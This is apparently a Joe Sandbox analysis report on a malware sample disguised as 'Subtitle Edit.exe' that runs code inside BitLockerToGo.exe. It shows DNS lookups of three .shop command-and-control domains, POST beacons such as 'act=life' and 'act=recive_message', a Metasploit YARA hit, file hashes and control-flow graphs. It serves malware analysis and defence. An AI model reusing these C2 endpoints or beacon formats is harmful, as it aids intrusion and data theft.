        Aug 29, 2024 15:40:24.347531080 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:24.347537041 CEST44349716188.114.96.3192.168.2.6
        TimestampSource PortDest PortSource IPDest IP
        Aug 29, 2024 15:40:20.499984026 CEST6126153192.168.2.61.1.1.1
        Aug 29, 2024 15:40:20.513205051 CEST53612611.1.1.1192.168.2.6
        Aug 29, 2024 15:40:21.613729954 CEST5009953192.168.2.61.1.1.1
        Aug 29, 2024 15:40:21.628468037 CEST53500991.1.1.1192.168.2.6
        Aug 29, 2024 15:40:22.581381083 CEST4920953192.168.2.61.1.1.1
        Aug 29, 2024 15:40:22.593060970 CEST53492091.1.1.1192.168.2.6
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Aug 29, 2024 15:40:20.499984026 CEST192.168.2.61.1.1.10x2a55Standard query (0)separateedmsqj.shopA (IP address)IN (0x0001)false
        Aug 29, 2024 15:40:21.613729954 CEST192.168.2.61.1.1.10x98ffStandard query (0)locatedblsoqp.shopA (IP address)IN (0x0001)false
        Aug 29, 2024 15:40:22.581381083 CEST192.168.2.61.1.1.10xf75Standard query (0)traineiwnqo.shopA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Aug 29, 2024 15:40:20.513205051 CEST1.1.1.1192.168.2.60x2a55No error (0)separateedmsqj.shop188.114.96.3A (IP address)IN (0x0001)false
        Aug 29, 2024 15:40:20.513205051 CEST1.1.1.1192.168.2.60x2a55No error (0)separateedmsqj.shop188.114.97.3A (IP address)IN (0x0001)false
        Aug 29, 2024 15:40:21.628468037 CEST1.1.1.1192.168.2.60x98ffNo error (0)locatedblsoqp.shop188.114.96.3A (IP address)IN (0x0001)false
        Aug 29, 2024 15:40:21.628468037 CEST1.1.1.1192.168.2.60x98ffNo error (0)locatedblsoqp.shop188.114.97.3A (IP address)IN (0x0001)false
        Aug 29, 2024 15:40:22.593060970 CEST1.1.1.1192.168.2.60xf75No error (0)traineiwnqo.shop188.114.96.3A (IP address)IN (0x0001)false
        Aug 29, 2024 15:40:22.593060970 CEST1.1.1.1192.168.2.60xf75No error (0)traineiwnqo.shop188.114.97.3A (IP address)IN (0x0001)false
        • separateedmsqj.shop
        • locatedblsoqp.shop
        • traineiwnqo.shop
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.649713188.114.96.34433992C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        TimestampBytes transferredDirectionData
        2024-08-29 13:40:21 UTC266OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: separateedmsqj.shop
        2024-08-29 13:40:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
        Data Ascii: act=life
        2024-08-29 13:40:21 UTC804INHTTP/1.1 200 OK
        Date: Thu, 29 Aug 2024 13:40:21 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=16s8u6unhcnknlsd341318it5l; expires=Mon, 23-Dec-2024 07:27:00 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AZ1D%2B4elCA0C8cKRCwxuSpH2cuWkNa5issnBtLpexkPWcdF1B%2BLY6Vg9RxYJeBH%2Fha2RlkEdWzx%2FkagiS2mcNWAFq1J0kiAPjr5Mc2rW%2BPOz40nLZrG3IMxgOdK9rzVXPanOi9NP"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8bacf3cfdad70cc1-EWR
        alt-svc: h3=":443"; ma=86400
        2024-08-29 13:40:21 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
        Data Ascii: aerror #D12
        2024-08-29 13:40:21 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.649714188.114.96.34433992C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        TimestampBytes transferredDirectionData
        2024-08-29 13:40:22 UTC265OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: locatedblsoqp.shop
        2024-08-29 13:40:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
        Data Ascii: act=life
        2024-08-29 13:40:22 UTC802INHTTP/1.1 200 OK
        Date: Thu, 29 Aug 2024 13:40:22 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=kev7t727ht0v3fed7421nvhd4t; expires=Mon, 23-Dec-2024 07:27:01 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FyjcpYDl%2FHrQl10UcCznL%2FEPL8GoFNapHYPHbHqjdwiA6qMJWqolLPjDlDeOrbKKDfuMJRzykKyvv4a%2BH8B9bCTxfSgGBBnft3rId3aOAXc4dYXXuuc2LG7UHNcHhA6h8ST2E4E%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8bacf3d69a5fc413-EWR
        alt-svc: h3=":443"; ma=86400
        2024-08-29 13:40:22 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
        Data Ascii: aerror #D12
        2024-08-29 13:40:22 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.649715188.114.96.34433992C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        TimestampBytes transferredDirectionData
        2024-08-29 13:40:23 UTC263OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: traineiwnqo.shop
        2024-08-29 13:40:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
        Data Ascii: act=life
        2024-08-29 13:40:23 UTC545INHTTP/1.1 200 OK
        Date: Thu, 29 Aug 2024 13:40:23 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        X-Frame-Options: SAMEORIGIN
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FvWeiBinCU86KQMv6434oFhK9INsfoK8p6MHdQrzqPSkWirLvLByLXoy%2FeyYQgBpk%2BWFAVowgzIeIWAC7EIYIw4%2FKBM9wuBrk4N1sHUScf8MRuQRCyXfa2iYiHYXpz37Bs9C"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8bacf3dcdeed4387-EWR
        2024-08-29 13:40:23 UTC824INData Raw: 31 31 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1128<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2024-08-29 13:40:23 UTC1369INData Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65
        Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
        2024-08-29 13:40:23 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 58 52 75 39 35 73 56 4e 6f 47 6b 53 65 48 61 54 4c 4b 65 36 65 63 5a 56 6b 71 36 63 6e 6c 54 58 74 50 4c 56 34 72 38 57 6d 61 73 2d 31 37 32 34 39 33 38 38 32 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 64 64 6f 73 2f 67 6c 6f 73 73 61 72 79 2f 6d 61 6c 77 61 72 65 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72
        Data Ascii: <input type="hidden" name="atok" value="XRu95sVNoGkSeHaTLKe6ecZVkq6cnlTXtPLV4r8Wmas-1724938823-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-btn" style="backgr
        2024-08-29 13:40:23 UTC838INData Raw: 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20
        Data Ascii: bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
        2024-08-29 13:40:23 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.649716188.114.96.34433992C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        TimestampBytes transferredDirectionData
        2024-08-29 13:40:23 UTC353OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        Cookie: __cf_mw_byp=XRu95sVNoGkSeHaTLKe6ecZVkq6cnlTXtPLV4r8Wmas-1724938823-0.0.1.1-/api
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 76
        Host: traineiwnqo.shop
        2024-08-29 13:40:23 UTC76OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 6e 35 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
        Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--n5&j=5c9b8674a630d9101b46733aa37f15ec
        2024-08-29 13:40:24 UTC815INHTTP/1.1 200 OK
        Date: Thu, 29 Aug 2024 13:40:24 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=atsh3eh75bjegfp6qg2sccpoep; expires=Mon, 23-Dec-2024 07:27:03 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        cf-cache-status: DYNAMIC
        vary: accept-encoding
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35lZQw2mpFFV9T1H04iBoUKRfM9KLd1odGm0vJxjM2o4CqRpqpo5eNmq8AnS5eLOMc9UPrwjN4xhNzd4tSB1Qxh87gdmPgJrgAheukIbEayA%2FpF58TRjY9CbPIvkOPryRATR"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8bacf3e0ff384259-EWR
        alt-svc: h3=":443"; ma=86400
        2024-08-29 13:40:24 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
        Data Ascii: aerror #D12
        2024-08-29 13:40:24 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Click to jump to process

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:09:40:11
        Start date:29/08/2024
        Path:C:\Users\user\Desktop\0Subtitle Edit.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\0Subtitle Edit.exe"
        Imagebase:0xa60000
        File size:18'028'032 bytes
        MD5 hash:C304E6D97F3A59F101484C104132C434
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
        Reputation:low
        Has exited:true

        Target ID:2
        Start time:09:40:18
        Start date:29/08/2024
        Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        Imagebase:0x580000
        File size:231'736 bytes
        MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Reset < >

          Execution Graph

          Execution Coverage:2.3%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:43.4%
          Total number of Nodes:76
          Total number of Limit Nodes:10
          execution_graph 12213 40a100 12215 40a113 12213->12215 12214 40a399 TerminateProcess 12214->12215 12215->12214 12218 40a3e6 12215->12218 12220 40a28f GetCurrentProcess 12215->12220 12221 40a419 TerminateProcess 12215->12221 12222 40a2da GetWindowInfo 12215->12222 12230 40d790 12215->12230 12234 40c650 FreeLibrary 12215->12234 12235 435cb0 12215->12235 12220->12215 12221->12215 12224 40b270 12222->12224 12225 40b306 LoadLibraryExW 12224->12225 12226 40b2ca 12224->12226 12227 40b31f 12225->12227 12226->12225 12228 40b513 GetProcessVersion 12227->12228 12229 40b619 12227->12229 12228->12229 12229->12215 12233 40d7c4 12230->12233 12231 40dbe7 GetSystemDirectoryW 12231->12233 12232 40dc77 12232->12232 12233->12231 12233->12232 12234->12215 12238 4370d0 12235->12238 12237 435cb5 FreeLibrary 12237->12215 12239 4370dd 12238->12239 12239->12237 12240 435e33 12242 435e63 12240->12242 12241 435ecf 12246 436333 12241->12246 12249 435da0 LdrInitializeThunk 12241->12249 12242->12241 12248 435da0 LdrInitializeThunk 12242->12248 12243 4363f0 12246->12243 12250 435da0 LdrInitializeThunk 12246->12250 12248->12241 12249->12246 12250->12246 12251 433dd2 12252 433e43 12251->12252 12253 433de0 RtlFreeHeap 12251->12253 12253->12252 12255 4380c0 12257 4380e0 12255->12257 12256 43822f 12257->12256 12259 435da0 LdrInitializeThunk 12257->12259 12259->12256 12260 4350b0 12262 435060 12260->12262 12261 43539c LoadLibraryExW 12261->12262 12267 4355b6 12261->12267 12262->12260 12262->12261 12262->12262 12262->12267 12263 435d66 12268 433d50 12263->12268 12265 435848 12267->12263 12267->12265 12271 435de0 12267->12271 12269 433d9e RtlAllocateHeap 12268->12269 12270 433d6a 12268->12270 12269->12265 12270->12269 12270->12270 12274 4367b0 12271->12274 12277 43650f 12274->12277 12275 4366ef 12277->12274 12277->12275 12278 435da0 LdrInitializeThunk 12277->12278 12278->12277 12279 40c926 12282 40c94a 12279->12282 12281 40ccc9 12281->12281 12282->12281 12283 435cd0 12282->12283 12284 435d66 12283->12284 12286 435cea 12283->12286 12285 433d50 RtlAllocateHeap 12284->12285 12285->12286 12286->12282 12287 42e2d4 12288 42e2db 12287->12288 12289 42e2f3 GetUserDefaultUILanguage 12288->12289 12290 42e32d 12289->12290 12291 435ef8 12292 435f40 12291->12292 12293 436338 12292->12293 12294 4360d1 12292->12294 12297 4362a6 12292->12297 12298 43634b 12292->12298 12300 436333 12292->12300 12303 43617f 12292->12303 12305 435da0 LdrInitializeThunk 12292->12305 12295 4367b0 LdrInitializeThunk 12293->12295 12294->12298 12294->12303 12309 435da0 LdrInitializeThunk 12294->12309 12295->12298 12297->12300 12307 435da0 LdrInitializeThunk 12297->12307 12300->12298 12308 435da0 LdrInitializeThunk 12300->12308 12306 435da0 LdrInitializeThunk 12303->12306 12305->12292 12306->12303 12307->12300 12308->12300 12309->12303

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 117 435ef8-435f3e 118 435f73-435f7f 117->118 119 435f40-435f71 117->119 120 435fa1-435fb6 call 435020 118->120 121 435f81-435f85 118->121 119->118 119->119 125 435fd1-436039 120->125 126 435fb8-435fbb 120->126 122 435f90-435f9f 121->122 122->120 122->122 128 43603b 125->128 129 43606e-43607f 125->129 127 435fc0-435fcf 126->127 127->125 127->127 130 436040-43606c 128->130 131 436081 129->131 132 4360c5-4360ca 129->132 130->129 130->130 143 436090-436096 131->143 133 436362-43636e 132->133 134 4360d1-4360d3 132->134 135 4360f0-436110 132->135 136 436360 132->136 137 4361c6-4361e6 132->137 138 4362a6-4362c8 132->138 139 436375-43638b 132->139 140 4360da-4360e2 132->140 141 43629a-43629f 132->141 142 436338-436355 call 4367b0 132->142 133->133 133->134 133->135 133->136 133->137 133->138 133->139 133->140 133->141 133->142 153 43644b-436492 133->153 134->140 144 4363f0 134->144 145 4363f8-43640f call 437ea0 134->145 148 436112 135->148 149 436150-43615d 135->149 146 4361e8 137->146 147 43621e-43622f 137->147 157 436300-43630d 138->157 158 4362ca 138->158 154 4363c1-4363c4 139->154 155 43638d-43638f 139->155 140->135 141->133 141->136 141->138 141->139 141->142 142->136 151 4360a1-4360a6 143->151 152 436098-43609d 143->152 144->145 180 436410 145->180 159 4361f0-43621c 146->159 160 436231 147->160 161 4361c0 147->161 167 436120-43614e 148->167 149->137 168 43615f-436163 149->168 151->132 165 4360a8-4360bd call 435da0 151->165 152->143 164 43609f 152->164 162 4364d3-4364df 153->162 163 436494 153->163 171 4363e5-4363e8 154->171 170 436390-4363bf 155->170 157->171 173 436313-436317 157->173 172 4362d0-4362fe 158->172 159->147 159->159 174 436240-436246 160->174 161->137 162->120 176 4364e5-4364e9 162->176 175 4364a0-4364d1 163->175 164->132 194 4360c2 165->194 167->149 167->167 187 436170-436176 168->187 170->154 170->170 171->144 171->145 178 436412-43641d 171->178 179 436702-436738 171->179 171->180 181 436610 171->181 182 436606-43660f 171->182 183 436424 171->183 184 436654-43668a 171->184 185 43650f 171->185 172->157 172->172 190 436320-436326 173->190 191 436260-436265 174->191 192 436248-43624d 174->192 175->162 175->175 193 4364f0-4364ff 176->193 178->179 178->181 178->182 178->183 178->184 178->185 188 436771-43677e 179->188 189 43673a 179->189 181->184 182->181 195 436506-43650e 183->195 196 4366c1-4366ce 184->196 197 43668c-43668f 184->197 185->182 198 436181-436186 187->198 199 436178-43617d 187->199 188->184 201 436784 188->201 200 436740-43676f 189->200 202 4363cc-4363d1 190->202 203 43632c-436331 190->203 191->161 205 43626b-43628d call 435da0 191->205 192->174 204 43624f 192->204 193->193 206 436501 193->206 194->132 209 4366d0-4366d4 196->209 210 4366fc 196->210 207 436690-4366bf 197->207 198->137 211 436188-4361b2 call 435da0 198->211 199->187 208 43617f 199->208 200->188 200->200 217 436788 201->217 202->171 213 4363d3-4363dd call 435da0 202->213 203->190 212 436333 203->212 204->161 219 436292-436295 205->219 206->120 206->195 207->196 207->207 208->137 215 4366e0-4366e6 209->215 210->210 211->137 212->171 224 4363e2 213->224 220 4366f1-4366f6 215->220 221 4366e8-4366ed 215->221 217->217 219->161 220->210 223 43678d-4367a1 call 435da0 220->223 221->215 225 4366ef 221->225 227 4367a6-4367d5 223->227 224->171 225->210 229 4367d7 227->229 230 436815-436820 227->230 231 4367e0-436813 229->231 230->179 230->181 230->182 230->184 230->185 231->230 231->231
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: %sgh$%sgh$4`[b$:U)K$@$bcC
          • API String ID: 2994545307-2112727669
          • Opcode ID: b5d144f314c2662fa5583cda79013e9df957fe0605692c56ebe624641feb9228
          • Instruction ID: b5c215e7344e4d1e3942b5c1b480a14c8510d73cef5b03997e00cda5eb2fd1a0
          • Opcode Fuzzy Hash: b5d144f314c2662fa5583cda79013e9df957fe0605692c56ebe624641feb9228
          • Instruction Fuzzy Hash: A60266742083429BD314CF08D990A2BBBF2FF8A705F65991EE4C59B391D339D845CB9A

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 438 40c926-40c948 439 40c983-40c999 438->439 440 40c94a 438->440 443 40c9a0-40c9a2 439->443 444 40c9aa-40c9cb 439->444 441 40c950-40c981 440->441 441->439 441->441 443->444 445 40ca00-40ca32 444->445 446 40c9cd-40c9cf 444->446 448 40ca73-40ca8d 445->448 449 40ca34 445->449 447 40c9d0-40c9fe 446->447 447->445 447->447 452 40cc40 448->452 453 40cd82 448->453 454 40cd42-40cd52 call 433dc0 448->454 455 40ccc9-40cccf 448->455 456 40cd8f-40cd99 448->456 457 40cdcf-40cfc4 448->457 458 40cc50-40cc75 448->458 459 40ccd0 448->459 460 40cd10 448->460 461 40cd12 448->461 462 40cc12-40cc26 448->462 463 40ccd2-40ccd9 448->463 464 40ca94-40caab 448->464 465 40cd18-40cd2d 448->465 466 40cd59 448->466 467 40cd5b-40cd62 448->467 468 40cbde-40cbfb 448->468 469 40cd9f-40cda6 448->469 470 40cce0 448->470 471 40cca2-40ccb6 call 435cd0 448->471 472 40cce6 448->472 473 40cd69 448->473 474 40cd6b-40cd7a 448->474 475 40cc2d-40cc3f 448->475 476 40ccf0-40ccf4 448->476 477 40cdb0 448->477 478 40cab2-40cb25 448->478 479 40cd34-40cd3b 448->479 480 40cd7b 448->480 481 40cc7c-40cc81 448->481 482 40ccbd-40ccc2 448->482 483 40ccfe-40cd03 448->483 450 40ca40-40ca71 449->450 450->448 450->450 452->458 496 40cd89 453->496 454->457 454->466 454->473 454->474 485 40d021-40d23f 454->485 455->459 456->469 488 40cfc6 457->488 489 40cfff-40d00a 457->489 458->453 458->454 458->455 458->456 458->457 458->459 458->460 458->461 458->463 458->465 458->466 458->467 458->469 458->470 458->472 458->473 458->474 458->476 458->477 458->479 458->480 458->481 458->483 458->485 462->452 462->453 462->454 462->455 462->456 462->457 462->458 462->459 462->460 462->461 462->463 462->465 462->466 462->467 462->469 462->470 462->471 462->472 462->473 462->474 462->475 462->476 462->477 462->479 462->480 462->481 462->482 462->483 463->453 463->454 463->456 463->457 463->460 463->461 463->465 463->466 463->467 463->469 463->470 463->472 463->473 463->474 463->476 463->477 463->479 463->480 463->483 463->485 464->452 464->453 464->454 464->455 464->456 464->457 464->458 464->459 464->460 464->461 464->462 464->463 464->465 464->466 464->467 464->468 464->469 464->470 464->471 464->472 464->473 464->474 464->475 464->476 464->477 464->478 464->479 464->480 464->481 464->482 464->483 465->454 465->457 465->466 465->467 465->473 465->474 465->479 465->485 466->467 467->457 467->473 467->474 467->485 492 40cc02-40cc0b 468->492 469->477 471->453 471->454 471->455 471->456 471->457 471->458 471->459 471->460 471->461 471->463 471->465 471->466 471->467 471->469 471->470 471->472 471->473 471->474 471->476 471->477 471->479 471->480 471->481 471->482 471->483 471->485 472->476 473->474 475->452 476->483 505 40cdb7 477->505 486 40cb27 478->486 487 40cb5e-40cb66 478->487 479->454 479->457 479->467 479->473 479->474 479->485 480->453 498 40cc88-40cc9b 481->498 482->453 482->454 482->455 482->456 482->457 482->459 482->460 482->461 482->463 482->465 482->466 482->467 482->469 482->470 482->472 482->473 482->474 482->476 482->477 482->479 482->480 482->481 482->483 482->485 483->460 493 40d010-40d01b 485->493 494 40d245 485->494 502 40cb30-40cb5c 486->502 503 40cb82-40cb92 487->503 504 40cb68-40cb6c 487->504 506 40cfd0-40cffd 488->506 489->485 492->452 492->453 492->454 492->455 492->456 492->457 492->458 492->459 492->460 492->461 492->462 492->463 492->465 492->466 492->467 492->469 492->470 492->471 492->472 492->473 492->474 492->475 492->476 492->477 492->479 492->480 492->481 492->482 492->483 493->485 511 40d250-40d27d 494->511 496->456 498->453 498->454 498->455 498->456 498->457 498->458 498->459 498->460 498->461 498->463 498->465 498->466 498->467 498->469 498->470 498->471 498->472 498->473 498->474 498->476 498->477 498->479 498->480 498->481 498->482 498->483 498->485 502->487 502->502 508 40cb94-40cb96 503->508 509 40cbba 503->509 507 40cb70-40cb80 504->507 505->457 506->489 506->506 507->503 507->507 513 40cba0-40cbb2 508->513 514 40cbbc-40cbdc 509->514 511->511 512 40d27f 511->512 512->493 513->513 516 40cbb4-40cbb8 513->516 514->468 516->514
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: PQ$s$~0$us
          • API String ID: 0-1729241119
          • Opcode ID: 92b6d4bfff756f377c6c1701a031c2bd17822f1c5fd609856eeba8f65b243fd3
